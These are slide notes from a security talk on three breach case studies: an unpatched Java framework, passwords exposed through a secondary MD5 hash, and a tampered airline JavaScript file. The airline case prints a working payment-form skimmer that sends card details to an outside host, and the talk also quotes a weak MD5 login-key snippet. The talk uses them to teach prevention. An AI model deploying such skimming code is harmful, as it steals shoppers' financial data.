Learning from
High Profile Failures
Danielle Adams | @adamzdanielle
Learning from
High Profile Failures
(My Favorite Hacks)
It is not the practice of keeping unauthorized parties out.
It is to make an attack too costly or
time-consuming to be worth the effort.
Cybersecurity
Useful terminology
-
threat: anything that can compromise the confidentiality, integrity or availability (CIA) of assets, such as a database
-
vulnerability: a weakness in an infrastructure that makes it susceptible to a threat
- attack: an exploitation of a vulnerability
Alice Agency
Case #1
(Fake names are used because we aren't here to shame anyone.)
Alice Agency
In March 2017, a vulnerability in a Java web framework was discovered, exposing an n-day vulnerability.
The vulnerability allowed remote code to execute when passed into Content-Type, Content-Disposition, and Content-Length headers.
N-Day Vulnerabilities
- Have been disclosed to a Common Vulnerabilities & Exposures (CVE) database.
- Different from 0-day, which are undiscovered.
- Of a study of 6300 vulnerabilities, over 99% were n-day.
- Can be fixed by making an available patch.
- Critical patches take an average of 30 days to fix.
Alice Agency
145.5 million people's sensitive data was accessed by an unauthorized third-party.
The confidentiality of the user data had been breached.
Prevention
Static Analysis
Running an analysis on the code for issues without executing it. Issues may include bugs at runtime and dependency vulnerabilities.
Different tools scan for different issues: ESLint and Typescript are both examples.
Dependency Scanner
Analyze source code to look for libraries that may have known vulnerabilities.
Best tools have high true positive rate, low false positive rate, and integrate well with workflows.
Snyk
Bob + Co.
Case #2
Bob + Co.
In September 2015, a data dump containing user data found online was confirmed to belong to the site.
Not long after, a second dump was released with internal emails and source code for their websites.
Bob + Co.
The dump appeared to be a lost cause because the passwords were encrypted and stored with BCrypt.
BCrypt is a hashing algorithm that, at its best, is incredibly slow to perform. It would have taken years and expensive resources to perform an attack on the password hash list.
a1bfe34
01bbf82
de9283c
3482498
mypassword
hello5
spot1234
danielle18
code run to look for matches
Dictionary List
Hash Dump
$username = !empty($Values['username_suggest']) ? $Values['username_suggest'] : $Values['username'];
$password = User::encryptPassword($Values['password']);
$password = $Values['password'];
$loginkey = md5(strtolower($username).'::'.strtolower($password));Source Code
MD5 vs. BCrypt
-
MD5
- one-way hashing function
- outputs 128-bit hash value
- fast to brute force
- took days to crack
- BCrypt
- one-way hashing function
- output starts with "$2"
- slow to perform
- would have taken years to crack
Bob + Co.
Entire profiles of 37 million users, including names, email addresses, phone numbers, credit card numbers, profile descriptions, weight and height, were released. This would not have happened if the second password hashing had not been created.
Confidentiality was imposed on, but, most importantly, privacy of users was also breached.
Privacy
Confidentiality refers to data, privacy refers to the person. It is just as important as CIA.
An attack on someone's privacy can put their emotions or life in immediate risk.
Prevention
$username = !empty($Values['username_suggest']) ? $Values['username_suggest'] : $Values['username'];
$password = User::encryptPassword($Values['password']);
$password = $Values['password'];
$loginkey = md5(strtolower($username).'::'.strtolower($password));Source Code
Collaboration
Work with security teams and engineers to create features and products that are secure by design.
International Airlines
Case #3
International Airlines
In late 2018, there were reports that JavaScript assets may have been tampered with for the airline's desktop and mobile app.
window.onload = function() {
jQuery("#submitButton").bind("mouseup touchend", function(a) {
var n = {};
jQuery("#paymentForm").serializeArray().map(function(a) {
n[a.name] = a.value;
});
var e = document.getElementByID("personPaying").innerHTML;
n.person = e;
var t = JSON.stringify(n);
setTimeout(function() {
jQuery.ajax({
type: "POST",
async: !0,
url: "https://fakeaways.com/gateway/app/dataprocessing/api",
data: t,
dataType: "application/json"
});
});
});
}International Airlines
An external analysis of the code concluded that it was likely a Stored Cross-Site Scripting (XSS) attack.
The malicious code had been appended to one of the airline's JavaScript files that contained an
open-sourced library used for their own distribution.
Cross-Site Scripting
XSS is #7 on the top vulnerabilities released by the Open Web Application Security Project (OWASP).
Browsers don't have a secure default, so it is up to the developer to create a safe experience.
Cross-Site Scripting
-
stored: malicious script injected at the server-level and returned to the user
-
reflective: malicious script injected into the browser via request means, such as query params
- DOM-based: malicious script manipulating the DOM environment of a victim
International Airlines
380 thousand users had their personal and financial details stolen while booking and updating reservations during a span of 15 days.
While it was a case of stolen data, the integrity of the website had also been compromised.
Prevention
Principle of Safe Default
While the airline never publicly described the attack, a strict Cross-Origin Resource Sharing (CORS) policy may have helped.
By creating a CORS policy with a trusted white list, the client is adhering to the design principle of secure default.
// CORS header
// don't do this in the original request
"Access-Control-Allow-Origin": "*"
// do this instead
"Access-Control-Allow-Origin": "https://*.realairways.com"Principle of Safe Default
Understand what the browser and what your protocol (ie. HTTP) can offer in terms of security.
This is always changing.
Use failures as an opportunity to create better software.
Děkuji vám!
Danielle Adams | @adamzdanielle